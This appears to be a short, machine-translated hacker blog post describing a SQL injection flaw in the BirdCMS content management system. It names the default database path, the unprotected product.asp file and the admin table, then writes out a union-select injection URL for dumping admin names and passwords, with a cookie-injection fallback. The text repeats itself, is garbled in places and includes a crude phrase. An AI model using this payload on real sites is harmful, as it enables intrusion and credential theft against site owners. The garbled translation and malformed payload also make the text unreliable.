In the BirdCMS management system, remember that the password 1.1 vulnerability has exploded! I don't know what's wrong with the latest version! I roughly looked at the source code, and the website management and programmers were all lazy! The default database data \ data # bird $. mdb vulnerability file product. asp does not seem to have any anti-injection. Open your legs and wait for another day! Table segment data_admin
In the Bird CMS management system, remember that the password 1.1 vulnerability has exploded! I don't know what's wrong with the latest version! I roughly looked at the source code, and the website management and programmers were all lazy!
// Default database data \ data # bird $. mdb
// Vulnerability file proDuCt. asp does not seem to have any anti-injection products. You can open your legs and wait for a day!
// Table segment data_admin
Construction statement:
Product. asp?Id=-30% 20 union % 20 select %, from % 20data_admin
The fields are name andPwdIf injection prevention is performed, inject Cookies!
Admin or Bird in the background
From H4ckx7's Blog